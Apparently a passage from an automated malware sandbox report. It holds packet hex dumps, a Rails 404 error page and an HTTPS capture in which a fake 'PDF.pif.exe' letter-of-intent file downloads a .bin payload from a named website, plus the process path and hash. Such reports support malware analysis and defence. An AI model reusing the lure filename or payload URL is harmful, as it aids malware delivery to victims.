                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 59 67 32 71 35 6f 5a 2f 5a 6f 4b 6f 65 66 75 79 76 30 70 6b 74 33 31 39 70 36 73 64 67 47 49 55 72 43 59 30 58 4d 72 4e 62 37 78 6f 4d 7a 6d 5a 70 35 62 69 35 69 38 6f 4d 2f 62 39 49 72 37 47 54 48 36 33 44 71 52 67 70 38 36 4f 43 61 6a 55 77 68 6a 58 43 6f 5a 4d 47 38 6e 49 71 37 51 42 47 34 69 4c 2b 72 46 7a 4c 77 6c 68 45 52 76 33 6e 35 64 66 6d 45 34 54 67 71 5a 63 70 32 70 46 75 42 6d 53 71 70 57 6d 78 57 5a 7a 4d 6e 42 58 50 54 38 66 33 57 2b 52 70 52 63 69 51 68 59 52 53 46 62 48 52 4c 53 34 33 47 36 51 59 59 50 36 33 62 51 62 6a 4f 4f 41 34 4d 57 69 4e 59 55 46 36 67 6e 75 37 45 4c 6a 36 33 54 2f 71 4a 61 42 50 52 54 4c 6f 6e 30 6b 7a 36 4e 6b 41 76 72 72 79 77 76 50 61 35 75 4e 71 33 50 36 58 44 57 62 73 5a 38 4d 62 39 48 6e 67 37 49 4c 61 54 62 75 4e 47 5a 6c 68 2b 7a 34 2b 53 64 6d 31 7a 6b 2f 54 56 68 33 37 6d 30 52 44 4f 73 4d 54 63 67 6c 59 5a 2b 4f 68 4d 67 34 71 42 75 30 41 4e 51 42 32 68 42 67 33 48 65 72 41 51 4e 50 2f 48 4a 43 64 6c 75 45 38 63 38 37 36 4b [TRUNCATED]
                                                                                    Data Ascii: 9hCtofh=Yg2q5oZ/ZoKoefuyv0pkt319p6sdgGIUrCY0XMrNb7xoMzmZp5bi5i8oM/b9Ir7GTH63DqRgp86OCajUwhjXCoZMG8nIq7QBG4iL+rFzLwlhERv3n5dfmE4TgqZcp2pFuBmSqpWmxWZzMnBXPT8f3W+RpRciQhYRSFbHRLS43G6QYYP63bQbjOOA4MWiNYUF6gnu7ELj63T/qJaBPRTLon0kz6NkAvrrywvPa5uNq3P6XDWbsZ8Mb9Hng7ILaTbuNGZlh+z4+Sdm1zk/TVh37m0RDOsMTcglYZ+OhMg4qBu0ANQB2hBg3HerAQNP/HJCdluE8c876KqFHbhPdcNdBXe7LPa8TAXhxTPM2lc6NF1/CGRQXMxopVxoZMAUVzny6nz7zLS5NZPIfiTn/T7qdoIou3sjzW5Q+9nzf/sm9DSxzt/x1P+qZJ5j9HCE2Z/8pE62WMPk18yGi9HCSrIX+yNKy8KkZ0hboBQRlsmLpDS+L5L7/UpZR9jtSZc5sE4VtNB+yUDk6YhAv+ramVbFIgxmMO7n2eBdku+eiunxP4swj4mePxG6UBjFidUmrhUKt7+SVgeiFL3ze+ItjKZU3amHTRAnHWIZcZwpL2NKVx0fiffcf6zT/YdfIvse/CTNiiX3sYUK5NDw6p79nfmHS8Tzv6yMdvM2ntGjugvj/cmPDoJSjd9ps1EP19kqKOy9CiTPjN7ZxnJm92wn/FKbFctP7scPm/OmctTank3sqX49C10bgBCvqZW4reahVfAKR41hr004QoIGSOKV2aH5Od6l4O7GP0vqqACPbVmjqn0Zaj4dwI7VWeW0zUqcNCj7e+ZgYDFn+iYHo/IDL17F5J1iukiBv9bYdJ3ny0CoHmFqpgPjJQNucnQk8owcnlEzAZ1fCLATqUEU3H4RCqn+/dVd5sZ4IuG4B6I2SrlyeRYFGKxgdgF2sP2LrvF1cEyRJgyGiuyQJ/NKUTfaI0DkX6VHHai6gqS9GIeEsQeJLciG [TRUNCATED]
                                                                                    Nov 6, 2024 20:34:24.595210075 CET1236INHTTP/1.1 404 Not Found
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    x-request-id: d5e43bac-84e2-4431-93f6-27b896edd65c
                                                                                    x-runtime: 0.035128
                                                                                    content-length: 27234
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                    Nov 6, 2024 20:34:24.595352888 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                                                    Nov 6, 2024 20:34:24.595366001 CET1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                                                    Nov 6, 2024 20:34:24.595380068 CET1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                                                    Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                                                    Nov 6, 2024 20:34:24.595705032 CET1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                                                    Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                                                    Nov 6, 2024 20:34:24.595717907 CET1236INData Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                                                    Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                                                    Nov 6, 2024 20:34:24.595731974 CET1236INData Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                                                    Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                                                    Nov 6, 2024 20:34:24.595746040 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d
                                                                                    Data Ascii: patch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">r
                                                                                    Nov 6, 2024 20:34:24.596024990 CET1236INData Raw: 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e
                                                                                    Data Ascii: / Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target
                                                                                    Nov 6, 2024 20:34:24.596674919 CET1236INData Raw: 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68
                                                                                    Data Ascii: "_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <
                                                                                    Nov 6, 2024 20:34:24.601495981 CET672INData Raw: 6e 79 20 6d 61 74 63 68 65 64 20 72 65 73 75 6c 74 73 20 69 6e 20 61 20 73 65 63 74 69 6f 6e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 4e 6f 4d 61 74 63 68 28 73 65 63 74 69 6f 6e 2c 20 6e 6f 4d 61 74 63 68 54 65 78 74 29 20 7b 0a
                                                                                    Data Ascii: ny matched results in a section function checkNoMatch(section, noMatchText) { if (section.children.length <= 1) { section.innerHTML += noMatchText; } } // get JSON from URL and invoke callback with result f


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.44973569.27.100.1854431220C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-06 19:32:37 UTC200OUTGET /quarantin/luiKzhysatQzs26.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                    Host: www.evolutioncosmetics.com
                                                                                    Cache-Control: no-cache
                                                                                    2024-11-06 19:32:37 UTC222INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Wed, 06 Nov 2024 19:32:35 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 288320
                                                                                    Connection: close
                                                                                    Last-Modified: Sun, 03 Nov 2024 17:24:16 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    2024-11-06 19:32:37 UTC16162INData Raw: 37 24 ac ac e3 15 2f f2 c9 8e 49 60 e1 40 92 5a 49 09 ba f2 92 a9 bf c3 0f 3a 23 92 67 93 4a 03 16 ab c1 d0 fb 52 1e 9a e2 0d 44 09 b5 88 05 3b 07 66 c0 e7 fb 4b 02 40 96 6b 26 16 81 00 10 7c 8c ab f5 69 88 34 30 51 37 47 e8 f9 8f d3 36 f2 84 4e 0c 86 76 c2 f0 9f 32 c7 98 37 7f ed 73 77 44 99 c5 a6 4e 29 98 a5 1f e2 61 c7 c3 93 b7 0c 6a 93 01 75 86 e8 45 7f e8 a1 7f 77 60 fc 1e f0 2d fa 76 84 65 72 91 90 15 54 c6 9a 14 15 e9 1f 46 08 9c 7a 3f 5c d6 4c b0 c1 a9 bc 6b ad e9 2d 86 52 01 33 3d ef 81 00 62 f8 7b 00 a9 c5 ad 19 2f d8 79 40 a8 b8 91 b2 dd b1 e6 9f 5f 71 04 87 23 03 47 2b 97 58 7e 39 28 2e 41 3c 75 53 d2 17 95 49 28 6e fb 38 a0 05 c7 98 a0 ae 2a 10 ae c6 13 05 bb 42 90 93 21 87 da e4 42 fa 54 e5 3d 06 48 05 ab 9a 0e 7d 00 ce aa 77 17 c0 fe 44 aa
                                                                                    Data Ascii: 7$/I`@ZI:#gJRD;fK@k&|i40Q7G6Nv27swDN)ajuEw`-verTFz?\Lk-R3=b{/y@_q#G+X~9(.A<uSI(n8*B!BT=H}wD
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: 9f 8b 9d 59 66 cf 08 c3 fd 33 30 6e a1 a5 c2 8a d2 d6 cb b2 95 75 39 51 15 65 9e fd 18 47 32 3a 4f 8c e8 8a ca 1b 1b 9d 71 8b 27 cd ba 00 52 bc 7c d2 9d a0 db 39 c0 cd 2d f7 3f fd 60 dd b6 5e 27 29 33 2e 0b 8d 14 27 fd 08 b9 87 70 fd d2 45 f2 d5 d3 40 0f a2 15 a2 b3 b7 35 84 fb 92 58 ee 8d b8 e9 17 cd ad a3 fb fe e7 8c 6e 13 c4 11 e1 90 5f f5 11 b7 bc 1a 7f 79 f7 99 0d a0 64 d4 41 0f e2 a6 8b be 6e 2d e2 52 75 c6 a6 d7 f6 1d 4a 09 a6 cf 9b 50 78 77 1c a7 ef 2b c1 cc dd 09 0d cc c9 f5 57 32 80 37 10 ed 34 40 42 bb c5 92 89 42 13 f2 ca 12 97 b8 32 33 c5 49 37 00 ad af 0b 33 09 0e d2 8d 83 a1 73 89 66 3c 70 a5 06 af 8e 93 eb 19 1d 12 c6 43 19 0e d5 b5 a4 af 81 25 46 c7 e6 09 80 99 5e 1b ae d8 95 03 8b 9b 6c d4 2f b5 8a 7d 05 00 e1 fb bb eb c5 b3 10 c7 e2 2a
                                                                                    Data Ascii: Yf30nu9QeG2:Oq'R|9-?`^')3.'pE@5Xn_ydAn-RuJPxw+W274@BB23I73sf<pC%F^l/}*
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: 7e 66 ae 4f 04 5a e6 1c f5 42 7e a1 22 dd d8 23 89 b9 e2 c3 53 b5 37 8c c7 ba 0a 7d 63 64 30 71 a3 25 eb cc e9 aa a0 92 0e e1 d4 aa 1e 1e 6c 0e de 96 e5 02 0c d2 16 8e 12 7a 41 f5 a7 1b 8e 55 bd 4c 44 49 65 a4 7c c6 a9 76 cd 82 fa 26 45 6e ff 78 c5 f8 58 91 12 29 98 55 fa 2d 76 3e b4 aa fe 05 e7 d0 9b db d5 93 82 3c cc 5c da 72 f0 67 38 12 40 12 4e f5 de ca ec ef e8 7f 03 28 69 d4 e6 6d aa 36 75 5c b1 13 8f 51 e4 c7 f9 16 13 2a 61 4e 39 6a 37 33 6b d0 5f e7 98 ec 56 45 86 3c 27 a2 20 99 30 08 37 91 39 bd 8f 3d d0 d6 07 6c 46 50 8a c6 b1 70 86 58 e4 08 55 60 dd 54 a2 7c ab a0 26 4f 79 cf e6 6d ac 15 82 b1 f2 40 b6 9d 34 1b 27 11 4b 7a d5 ad 3e a1 2c 79 e7 8a 48 f7 04 41 87 c1 f9 ca fd 3f e7 17 e1 fc 4a 50 15 95 88 67 bb d3 36 82 ad d7 cb ed 89 c9 88 31 19
                                                                                    Data Ascii: ~fOZB~"#S7}cd0q%lzAULDIe|v&EnxX)U-v><\rg8@N(im6u\Q*aN9j73k_VE<' 079=lFPpXU`T|&Oym@4'Kz>,yHA?JPg61
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: 40 8e 73 4b 54 17 cb 96 fc c9 23 f0 9f 23 31 a9 60 fe 59 f8 fe 7b 44 03 8d d0 c4 e6 f7 66 c2 ab 89 aa ff 09 d0 0d 86 cd 99 43 bc 83 36 1d 0f 2e 5c 52 0a cd 4f fc ca 4c b5 58 03 20 6b 9e f9 d8 e4 b4 95 41 d2 fb a0 ba 1d f1 77 6c 60 0c ed 17 86 dc 64 bb 91 bd bc 7a 9d 00 78 14 97 5f 9d 22 03 e8 ca c5 8e 0f 8e a5 7f e3 7c 40 c4 1f ba 52 73 6d d5 e9 fd 2d 43 16 1d f9 8c 49 a6 5b 44 e1 f7 a3 f5 a9 c4 f7 f4 2d 3d 6e 49 80 94 c5 1b ef 6a ea 8f c6 4d 51 49 e0 e1 2e ec c0 48 8b 9f 2f e8 4f f7 35 b2 3e 8e da 89 c2 29 90 ba 6f 0b 0e ce 3b 65 88 89 ec df 44 38 d5 81 59 53 67 2a 27 68 27 fe e3 35 bd c9 31 ef b7 92 42 2f c4 1a 79 b6 05 0d 0d 6a 33 91 a5 ef e3 c6 02 11 4e b0 8f c3 ad dc cc e6 9f ed 84 b1 e5 4c c7 39 3c dc 23 27 3b 37 1e 64 5f 3e f4 74 6e c9 8d 05 0d 1c
                                                                                    Data Ascii: @sKT##1`Y{DfC6.\ROLX kAwl`dzx_"|@Rsm-CI[D-=nIjMQI.H/O5>)o;eD8YSg*'h'51B/yj3NL9<#';7d_>tn
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: 1d 30 f4 1f 11 05 f0 0b 39 ee fe ba d3 ba 82 16 23 46 90 af 85 2d ea e1 d7 3f b3 9b 40 7c 04 16 17 e5 78 2b 06 58 67 56 d7 a8 1b 9e fb d3 ca 58 c8 f6 1d e3 c1 b9 64 9b b1 eb 3b 86 37 0b d8 d4 25 0e 9d c0 37 9f 65 90 99 f3 f4 8d 16 6e 57 65 4d e5 8f 80 67 65 22 06 d4 99 ec 76 98 c1 c5 38 48 33 dc 3b 9c b8 fd 3b d7 60 0e ed c6 b7 10 89 f9 ed 79 cd a6 8e 4b cd 89 24 3e d0 9f 89 af 03 0e a3 d7 41 71 aa b1 2f 26 a0 24 84 5f 71 36 28 15 30 00 88 9b 99 16 c2 c8 79 65 0b 8f 7b 89 bf aa 5e a0 ef ff be f0 b0 e1 82 29 ac 6c f2 34 8a 1e 0b dd 3f d4 a0 e3 9f 04 0e 27 a8 29 17 86 0a fb 8a e7 aa ff 33 c4 fd a5 4f d7 a4 fc 9d a7 60 40 ab fe fa 83 76 d6 77 28 8a 51 bb ca 98 eb 23 34 38 b0 5e 1c 66 75 14 30 03 5b dc d8 cc 29 e7 fa b8 0d ff be 47 c9 ee 57 e0 66 dc 6d f5 4f
                                                                                    Data Ascii: 09#F-?@|x+XgVXd;7%7enWeMge"v8H3;;`yK$>Aq/&$_q6(0ye{^)l4?')3O`@vw(Q#48^fu0[)GWfmO
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: 16 a5 bc 6f e7 3d e8 74 03 b5 da c7 bb 84 9c 00 72 e2 10 6b e3 88 43 09 1a e6 96 70 f6 f6 07 aa 18 26 3b 30 b3 48 74 31 e3 5e 18 6f 4f d0 0e 92 35 96 d4 89 64 4f 85 f6 3c 4a 76 d8 a3 e4 45 a9 f3 93 43 a7 78 62 9b 2f 82 0f b9 23 9b ec 35 fa fe 7f a5 87 27 c8 14 b4 78 9c d4 c2 9f 9d 51 82 c9 ad 51 0f 8f 8c f0 6f 06 2d cb 77 5d 69 6c 9a b2 4b f6 53 c7 9b 10 ef 92 2d f3 d4 76 23 85 ff 81 f5 03 41 70 15 b6 b6 0b 99 b3 8f 64 1a 3f 8e 55 82 31 28 41 0f c3 5b ec c2 e1 c9 58 d3 64 50 56 70 0c b0 53 64 e4 28 9a 2d 89 b4 99 dc 54 55 80 e6 fa a6 94 75 50 ab 5c d0 5c 54 d4 b3 36 bb 1b 78 5b 1b 32 24 22 ff a0 c9 08 83 44 14 e3 bd a0 18 b7 d6 8b cc 29 37 96 e4 bc a5 d0 b2 90 3a 80 7e cc 57 27 45 bc 08 67 e2 15 e0 2e e0 ee 98 33 46 cc 6d 20 07 b5 d9 05 91 3e 37 a2 1e 63
                                                                                    Data Ascii: o=trkCp&;0Ht1^oO5dO<JvECxb/#5'xQQo-w]ilKS-v#Apd?U1(A[XdPVpSd(-TUuP\\T6x[2$"D)7:~W'Eg.3Fm >7c
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: 2b 5a 4b fc cc 8c 08 2b 8e 21 c9 2d 18 c2 9d 5d ee d3 dd 2f 23 47 8b c7 1d 70 b1 7b 0c 22 7b 6b 23 87 48 97 b6 19 bd 5c 31 0d 0a 0b 5a f1 a0 08 2b 94 0c 4c 0b 5e d8 99 26 22 a0 92 ab 51 08 af a2 c9 9f 22 dc 80 d3 05 b7 ad c3 82 3b 18 fa ab 1f c8 e2 e5 07 24 c0 76 71 e3 34 d5 8b 4a 5a 9a 6a d8 16 63 21 07 8d 81 35 50 1f 1b 8e 67 41 c7 4f 1a 44 53 df 9c ab 4b 29 e6 23 ed 18 7a c5 84 eb a7 69 63 4f bd c2 1c 6e 01 ee 51 e6 51 43 be b0 01 31 aa 3d fa 94 44 a3 47 bc 6d 99 69 e6 b0 28 1d 05 49 d3 9f 96 8e ed f1 28 98 46 71 d2 11 c2 0b 73 51 4b 81 07 ed 84 15 a1 f8 73 53 3e 6c cc 97 58 ff ce 96 11 a1 ab d3 a5 80 0f 10 c5 55 bf f4 58 6e 5c 2a 29 f3 28 60 ad 80 d8 ef aa 10 ce ca 0b 22 d7 a8 05 b2 16 db 32 2f 3c e1 2b 78 11 95 91 71 16 5a 39 f8 b4 d0 cf 39 14 72 a1
                                                                                    Data Ascii: +ZK+!-]/#Gp{"{k#H\1Z+L^&"Q";$vq4JZjc!5PgAODSK)#zicOnQQC1=DGmi(I(FqsQKsS>lXUXn\*)(`"2/<+xqZ99r
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: b9 96 d4 e7 45 05 98 06 b7 8d 4d 81 4d c0 3a e3 17 ee e3 18 77 db 66 d1 be 7a e6 09 ef 18 57 96 b3 a0 86 88 9e 08 67 51 0d bf b9 46 66 dc 72 47 23 39 bb 01 80 92 83 4b 52 2b 6b 9b 19 1c 88 94 f6 44 6b b8 dc e0 da 7f 9f 5d 06 71 9f 4b 6f 95 b0 8c d5 01 30 d0 61 23 0e 03 24 d2 5b e7 82 93 b2 41 17 94 a7 ab 00 26 47 30 63 f6 ab d8 27 82 e0 3c 78 11 c6 0a cc 55 f2 39 ba b0 5d c6 11 0c cf b6 f6 58 c6 20 7e bc 0a c6 3c e5 9d 01 92 23 2c 24 95 9a a9 fa ba c1 80 4d 92 40 9c 8e 6d 86 76 ff 0f 14 6e 3f 1b 4a c0 81 8d 4c db d3 0a 32 e8 5f 93 f3 c4 4d 4a bd 21 8c 56 81 26 0e 6c 2b 00 b8 37 99 4a c9 b5 70 e1 ed 30 56 43 3e 08 7e 32 2b cb 96 7f b9 f9 9b c1 62 9b 75 ce 25 6b e1 59 99 e9 dc fc 86 82 87 d4 d9 25 78 91 0c 75 a1 ce fd fe 50 29 f0 06 3c 40 84 dc 1c cd 2e 56
                                                                                    Data Ascii: EMM:wfzWgQFfrG#9KR+kDk]qKo0a#$[A&G0c'<xU9]X ~<#,$M@mvn?JL2_MJ!V&l+7Jp0VC>~2+bu%kY%xuP)<@.V
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: a1 9e 04 d1 b9 06 7a 87 a8 9d d5 c9 e1 67 54 72 6a 40 03 c2 af f1 c6 96 a8 41 16 3a d0 25 22 12 79 8f 88 38 d1 07 64 5f aa cc 81 fb b4 d8 d2 e4 b4 3f ac e2 c9 fb 0f 7a 73 dd 78 16 98 af 49 e6 00 00 45 93 6f e0 7e 5a b7 c0 ac e7 51 b1 15 dd 0f f4 b0 ee de b1 f5 61 5b c9 c8 14 1b 6a ba 81 b2 a0 5e 06 dc 02 a4 70 23 2e cd 30 b1 06 34 cf 23 27 12 fc 76 58 ea 65 35 38 ea 48 db f8 84 7d dc 78 5d af ce be c4 7b 6b 83 f9 8c b4 c6 04 54 29 3b 73 59 db 86 32 a6 31 bc 05 42 6c 5b 13 82 62 b7 19 02 cd 11 98 67 53 f8 64 85 a4 9e ea 39 4b d0 61 17 12 d8 f5 f9 23 ed 74 e3 cb 2d 3c 27 04 58 36 10 5f 44 c8 d6 ca e2 2b 32 72 2d e3 34 17 62 53 5f 5e 28 7a de 1d 8e 8e 97 8b 11 2f d9 44 c8 14 37 d8 6f 4a bb bb bf 66 17 f3 8e f0 ab ef ad c4 ed 95 41 ad f4 ac e0 48 00 6c fe 78
                                                                                    Data Ascii: zgTrj@A:%"y8d_?zsxIEo~ZQa[j^p#.04#'vXe58H}x]{kT);sY21Bl[bgSd9Ka#t-<'X6_D+2r-4bS_^(z/D7oJfAHlx
                                                                                    2024-11-06 19:32:37 UTC16384INData Raw: bc 96 51 f6 bf 45 d2 58 9f 6b 7c 10 0e 63 94 9f b4 ff b0 18 65 28 47 6b 32 b7 94 6c a8 5f f9 5a c6 f4 f5 c6 c6 68 b8 d6 98 70 57 55 94 f4 80 84 c4 f8 b3 7c 65 41 e0 dd 65 6a 5a d6 f1 4c c1 1b db 3c a0 8e 84 64 61 c4 26 67 10 88 93 a7 c8 84 37 13 9e e3 e0 0c 74 6e c6 49 76 7e 91 3c 37 e2 cc 20 c6 ea 71 f1 3a ca dc 8f d0 84 c9 a1 a3 4c c8 7d ff b8 c2 77 cf b4 8d d3 e7 9e fe 96 d3 35 29 24 ae c5 16 b1 3f e5 b7 d3 0d eb ff cc e9 e9 76 90 f4 5a 46 ef ae 7c 84 2f da 83 0b 4b 0f 3d c0 64 0f 49 01 e9 57 da be b7 38 4f a5 03 03 88 d5 5b c1 86 b5 81 b6 81 ec d4 e0 a2 ac 85 f1 47 7f 77 e2 91 ff 56 68 c1 72 c7 99 b0 2d 9a 09 f3 19 a0 a0 1f 22 c5 b2 00 61 f9 0e 7f 54 ca 7b dd 2a c1 d9 aa 13 68 18 30 86 6f 1f 60 7e 1f 49 38 67 71 9e 58 a6 5c be 4e 5f 51 c0 7c cd 04 66
                                                                                    Data Ascii: QEXk|ce(Gk2l_ZhpWU|eAejZL<da&g7tnIv~<7 q:L}w5)$?vZF|/K=dIW8O[GwVhr-"aT{*h0o`~I8gqX\N_Q|f


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:14:32:17
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:872'244 bytes
                                                                                    MD5 hash:629BE165860D2336755DE85467756639
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
